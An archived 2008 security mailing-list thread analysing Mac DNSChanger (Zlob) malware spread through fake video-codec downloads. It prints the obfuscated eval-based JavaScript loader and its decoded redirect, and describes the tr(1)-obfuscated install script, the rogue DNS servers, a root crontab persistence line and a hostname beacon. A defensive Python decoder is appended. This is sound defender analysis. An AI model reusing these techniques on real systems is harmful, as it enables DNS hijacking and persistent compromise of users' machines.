[nsp-sec] [ OT ] MacOS X malware

Brian Eckman eckman at umn.edu
Wed Apr 2 16:18:22 EDT 2008


Rob,

I'm sure this isn't news to you, but it might help clarify things for 
others. This is the Mac equivalent of Zlob (also known generically as 
DNSChanger). The two DNS servers given to infected hosts will be within 
the 85.255.112.0/20 network - I think almost always within 
85.255.112.0/22. Based on my observations, I'd guarantee there are over 
229 infected Macs in Minnesota alone, not to mention 50x that in Windows 
boxes.

I've heard other rumors (besides the livejournal link you provided) that 
RBN is involved with Zlob, but I've never heard more than highly 
speculative comments. Regardless, the folks behind this line of malware 
are clearly very well funded and well organized. It's getting disgusting 
how long this line of malware has been around and how many *millions*[1] 
of hosts have been infected, and yet there is little to no press 
attention given to it (and who knows how much/little LE attention). They 
own a massive number of domains, generate a huge quantity of malware, 
make millions off of numerous bogus anti-spyware programs (almost 
certainly created in house) as well as large commissions from some 
gray-ish anti-spyware, and historically, even commissions from 
affiliate networks such as (but not limited to) amazon.com's 
"Associates" program.

We have been null routing 85.255.112.0/20 for nearly two years now, as 
well as some other Intercage IP space.

Cheers,
Brian

[1] 
http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx 
provides some reference as to how big the Zlob problem is. One week 
after the Sept, 2007 MSRT was released, the Zlob family had been removed 
from 664,258 machines. This was the same month MSRT first got rid of 
Storm; that was removed from 274,372 machines in the same time period. 
Granted, Zlob had about a two year head start... (But I wonder how many 
infected machines had already been cleaned/reinstalled/recycled by then?)

Rob Thomas wrote:
> ----------- nsp-security Confidential --------
> 
> Hi, team.
> 
> Given the large number of Mac users in this community, and given that 
> this collection of dodgy web sites are infecting Windows and MacOS X, I 
> thought this was reasonably appropriate for this list.  Some folks on 
> this list might want to take action against some of these IPs.
> 
> Yes it's true - there is malware for the MacOS X platform.  While this
> report will cover a recent release, the malware itself isn't new and
> hacking MacOS X isn't new, either.
> 
> You can read a public blog post and some useful follow-ups at the
> following URL:
> 
>     <http://tacit.livejournal.com/238112.html>
> 
> Here is our analysis.  Some of these links are rude even in name, and
> all of them are unsafe.
> 
> The fun begins with at least one porn site.  The site brings the user
> through a few redirects to a site here:
> 
>     88.85.72.147
> 
>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>     35415   | 88.85.72.147     | 88.85.64.0/19       | NL | ripencc  | 2006-02-08 | WEBAZILLA WebaZilla European Network
> 
> The page there loads some fun Javascript:
> 
>     var str=["332", "331", "331", "331", "440", "419", "436",
>     "354", "434", "433", "440", "383", "370", "381", "332",
>     "331", "331", "331", "424", "439", "432", "421", "438",
>     "427", "433", "432", "354", "443", "441", "439", "427",
>     "422", "420", "430", "444", "433", "427", "362", "435",
>     "439", "423", "436", "443", "363", "445", "332", "331",
>     "331", "331", "331", "441", "427", "432", "422", "433",
>     "441", "368", "430", "433", "421", "419", "438", "427",
>     "433", "432", "383", "361", "426", "438", "438", "434",
>     "380", "369", "369", "430", "419", "432", "422", "427",
>     "432", "425", "426", "419", "430", "430", "368", "421",
>     "433", "431", "369", "427", "432", "368", "421", "425",
>     "427", "385", "373", "361", "381", "332", "331", "331",
>     "331", "447"];
>     var temp='';
>     var gg='';
>     for (i=0; i<str.length; i++){
>        gg=str[i]-322;
>        temp=temp+String.fromCharCode(gg);
>     }
>     eval(temp);
> 
> This translates to (I've heavily obfuscated the URL below):
> 
>     var pov=0;
>     function ywuidblzoi(query){
>        window.location='h x x p : / / landinghall . com / in.cgi?3';
>     }
> 
> The host landinghall.com resolves to 88.214.202.180, located at the
> following provider:
> 
>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>     23393   | 88.214.202.180   | 88.214.192.0/18     | GB | ripencc  | 2006-01-18 | ISPRIME - ISPrime, Inc.
> 
> In addition to the malware, the images are extremely graphic.  Consider 
> yourself warned.
> 
> The web site determines the visitor's OS and then decides which malware
> to offer.  This is masked as a video codec to play the porn
> available on this "PornTube" (their name) site.
> 
> Note well that if the browser has pop-ups blocked, there is no risk to
> MacOS X users so far as we can discern.
> 
> At this point the MacOS X user is prompted to download a disk image for
> installation.  This image is named 1023.dmg and is served from:
> 
>     64.28.178.27, 64-28-178-27-rev.cernel.net
> 
>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>     27595   | 64.28.178.27     | 64.28.176.0/20      | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
> 
> The MacOS X user *must* provide his or her password to enable the
> installation of this malware masked as a video player.  This is not a
> 0day attack - it is social engineering.
> 
> The preinstall and preupgrade scripts are the same and contain 25 lines.
> Both use an interesting obfuscation technique - the Unix tr(1) command.
> 
> The script first cat(1)'s itself and pipes the bottom 23 lines of itself
> through tr(1).  The first tr(1) round does the following (I've cleaned
> this up a bit to make it more legible):
> 
>     tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
> 
> It next sets two variables:
> 
>     s1 = cx.zxx.aas.xd
>     s2 = cx.zxx.aaz.ace
> 
> The script called "1" is now run with these two variables as arguments,
> piped through tr(1) again (line split to make it more legible):
> 
>     sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
>     `echo $s2| tr qazwsxedcr 0123456789`
> 
> The tr(1) command translates those two "strings" into the following two
> IP addresses:
> 
>     s1 = 85.255.114.57
>     s2 = 85.255.112.186
> 
> Those IPs belong to:
> 
>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>     27595   | 85.255.114.57    | 85.255.114.0/23     | UA | ripencc  | 2005-06-16 | INTERCAGE - InterCage, Inc.
> 
>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>     36445   | 85.255.112.186   | 85.255.112.0/24     | UA | ripencc  | 2005-06-16 | CERNEL-ASN - Cernel, Inc
> 
> The script called "1" looks for some basic IPv4 settings on the Mac.
> It then replaces the DNS name servers in the netinfo database with
> 85.255.114.57 and 85.255.112.186.  Any DNS queries from the compromised
> Mac are now sent to these two name servers.
> 
> Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.
> 
> These IPs are no stranger to badness.  We count 17 distinct samples in
> our malware menagerie that reference 85.255.114.57.  The host at
> 85.255.112.186 has been involved with at least 60 malware samples that
> hijack DNS settings.
> 
> If a query is made for a non-existent DNS RR, these DNS name servers
> return an answer of 64.28.185.108.
> 
>     64.28.185.108, 64-28-185-108-rev.cernel.net
> 
>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>     27595   | 64.28.185.108    | 64.28.176.0/20      | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
> 
> The script then installs itself into root's crontab as:
> 
>     * * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"
> 
> By default there is no root crontab on MacOS X, so this one really
> stands out.
> 
> The QuickTime.xpt script is just a copy of the "1" script.  This will
> now run once per minute, as root, ensuring the malware and the DNS
> changes aren't removed or lost for long.
> 
> A Perl script named "sendreq" is run and deleted.  This script is a
> beacon, sending the output of "uname -p" (the machine processor
> architecture name, e.g. "i386") and the hostname(1) command to a web
> server.  The web server is:
> 
>     64.28.188.220, 64-28-188-220-rev.cernel.net
> 
>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>     27595   | 64.28.188.220    | 64.28.176.0/20      | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
> 
> This is done as an HTTP GET command from the compromised Mac, with the
> Accept-Language: field set to the information obtained from the
> uname(1) and hostname(1) commands run on the compromised Mac.
> 
> We see at least 227 victims, mostly in the US.
> 
> Thanks,
> Rob.
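The two decoding steps from Rob's quoted analysis (the charcode-offset JavaScript loader and the tr(1) digit substitution) and Brian's check against the null-routed 85.255.112.0/20 block, written out as an added example that is not part of either post; the helper names and the 192.0.2.53 sample resolver are assumptions, and the charcode array is cut down to the first statement to keep it short.

```python
"""Decode the two obfuscation tricks from the quoted analysis without running
them, then flag recovered name servers inside the sinkholed range."""
import ipaddress

# Constructed from the quoted JavaScript: only the first 14 entries of the
# original 106-entry array, which decode to the "var pov=0;" statement.
JS_CODES = ["332", "331", "331", "331", "440", "419", "436", "354",
            "434", "433", "440", "383", "370", "381"]
OFFSET = 322          # the "-322" applied in the loader's for loop


def decode_charcodes(codes, offset=OFFSET):
    """Reproduce String.fromCharCode(str[i]-322) statically, no eval()."""
    return "".join(chr(int(c) - offset) for c in codes)


# tr(1) with a from-set and a to-set is a positional character map;
# str.maketrans builds exactly that table for `tr qazwsxedcr 0123456789`.
TR_DIGITS = str.maketrans("qazwsxedcr", "0123456789")


def decode_tr_ip(token):
    """Equivalent of `echo $token | tr qazwsxedcr 0123456789`, validated
    as an IPv4 address so a mis-transcribed token fails loudly."""
    return str(ipaddress.IPv4Address(token.translate(TR_DIGITS)))


# The /20 Brian reports null-routing; both rogue resolvers fall inside it.
SINKHOLED = ipaddress.IPv4Network("85.255.112.0/20")


def rogue_resolvers(servers, blocked=SINKHOLED):
    """Return the configured name servers that sit inside the blocked range."""
    return [s for s in servers if ipaddress.IPv4Address(s) in blocked]


if __name__ == "__main__":
    print(repr(decode_charcodes(JS_CODES)))   # '\n\t\t\tvar pov=0;'
    s1 = decode_tr_ip("cx.zxx.aas.xd")        # 85.255.114.57
    s2 = decode_tr_ip("cx.zxx.aaz.ace")       # 85.255.112.186
    # 192.0.2.53 is a constructed, legitimate-looking resolver for contrast.
    print(rogue_resolvers([s1, s2, "192.0.2.53"]))
```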
